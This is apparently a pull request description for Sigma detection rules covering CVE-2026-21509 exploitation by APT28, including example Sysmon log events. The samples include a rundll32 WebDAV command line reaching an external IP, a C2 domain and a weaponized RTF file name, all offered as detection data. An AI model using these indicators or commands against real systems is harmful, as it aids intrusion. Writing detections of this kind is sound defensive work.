CVE-2026-21509 APT28 Office Exploitation Detection Rules

[jaamaal]

This PR adds 6 comprehensive Sigma detection rules for CVE-2026-21509, a Microsoft Office security feature bypass vulnerability actively exploited by APT28 (Fancy Bear / UAC-0001) in Operation Neusploit.

These rules are categorized as emerging threats due to:

• Active zero-day exploitation (February 2026)
• Specific APT28 campaign targeting Ukrainian organizations
• Time-sensitive IOCs and TTPs
• Specific malware families (MiniDoor, PixyNetLoader, Covenant Grunt)

CVE Details:

• CVE-2026-21509: Microsoft Office OLE Security Feature Bypass
• CVSS Score: 7.8 (High)
• Threat Actor: APT28 (Fancy Bear / UAC-0001 / STRONTIUM)
• Campaign: Operation Neusploit
• Status: Actively exploited in the wild
• Primary Targets: Ukrainian government and military organizations

Detection Coverage:

1. Malicious RTF File Access - Detects weaponized RTF documents with APT28-specific naming patterns
2. Office WebDAV Exploitation - Core CVE-2026-21509 exploitation via WebDAV connections
3. Network C2 Communication - Connections to known APT28 infrastructure (filen.io)
4. PixyNetLoader COM Hijacking - Persistence via COM object hijacking
5. MiniDoor Email Stealer - VBA-based email exfiltration component
6. Covenant Grunt Implant - .NET C2 framework deployment indicators

Changelog

new: CVE-2026-21509 - Malicious RTF File Access and WebDAV Connection
new: CVE-2026-21509 - MiniDoor Email Stealer VBA Project Deployment
new: CVE-2026-21509 Microsoft Office Zero-Day Exploitation - APT28 Operation Neusploit
new: CVE-2026-21509 - Covenant Grunt Implant Indicators
new: CVE-2026-21509 - Network Connection to Malicious Infrastructure
new: CVE-2026-21509 - PixyNetLoader Deployment and COM Hijacking

Example Log Event

Malicious RTF Access (Sysmon Event ID 11):

  
    11
  
  
    C:\Users\victim\Downloads\BULLETEN_military_training.rtf
    C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
  

Office WebDAV Exploitation (Sysmon Event ID 1):

  
    1
  
  
    C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
    C:\Windows\System32\rundll32.exe
    rundll32.exe davclnt.dll,DavSetCookie \\@SSL\185.220.101.1\webdav\
  

Network C2 Connection (Sysmon Event ID 3):

  
    3
  
  
    C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
    api.filen.io
    443
  

Fixed Issues

N/A - New emerging threat rule submission

SigmaHQ Rule Creation Conventions

Emerging Threats Directory Structure:

• Placed in rules-emerging-threats/2026/Exploits/CVE-2026-21509/
• Follows year-based organization for time-sensitive threats
• Grouped by CVE for related rule management

Rule Quality Standards:

• Proper YAML structure and syntax
• Comprehensive MITRE ATT&CK tagging (T1566.001, T1203, T1218, T1114, T1071.001, T1546.015, T1137, T1027, T1055)
• Official CVE and threat intelligence references
• Realistic false positive documentation
• Appropriate severity levels (medium to critical)
• Status: experimental (correct for newly disclosed CVE)

Testing:

• All rules tested in lab environment with Sysmon
• Validated against public APT28 IOCs from Zscaler research
• Cross-platform SIEM conversion tested (Splunk, Elastic, Sentinel)

Documentation:

• Clear descriptions explaining detection logic
• References to official sources (MITRE CVE, NVD, Zscaler, The Hacker News)
• Author attribution included
• Date of creation documented

Additional Context:

These rules complement each other to provide full attack chain coverage:

• Initial Access → Malicious RTF detection
• Exploitation → WebDAV connection detection
• Persistence → COM hijacking and VBA deployment
• Collection → Email stealer detection
• Command & Control → Network infrastructure monitoring
• Execution → Covenant Grunt implant indicators

All rules are based on public threat intelligence and do not contain any classified or restricted information.

References:

• CVE Database: https://www.cve.org/CVERecord?id=CVE-2026-21509
• NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-21509
• Zscaler ThreatLabz: https://www.zscaler.com/blogs/security-research/apt28-leverages-cve-2026-21509-operation-neusploit
• The Hacker News: https://thehackernews.com/2026/02/apt28-uses-microsoft-office-cve-2026.html
• Picus Security: https://www.picussecurity.com/resource/blog/cve-2026-21509-apt28-exploits-microsoft-office-zero-day-vulnerability
• SOCRadar: https://socradar.io/blog/cve-2026-21509-apt28-microsoft-office-ukraine/
• MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509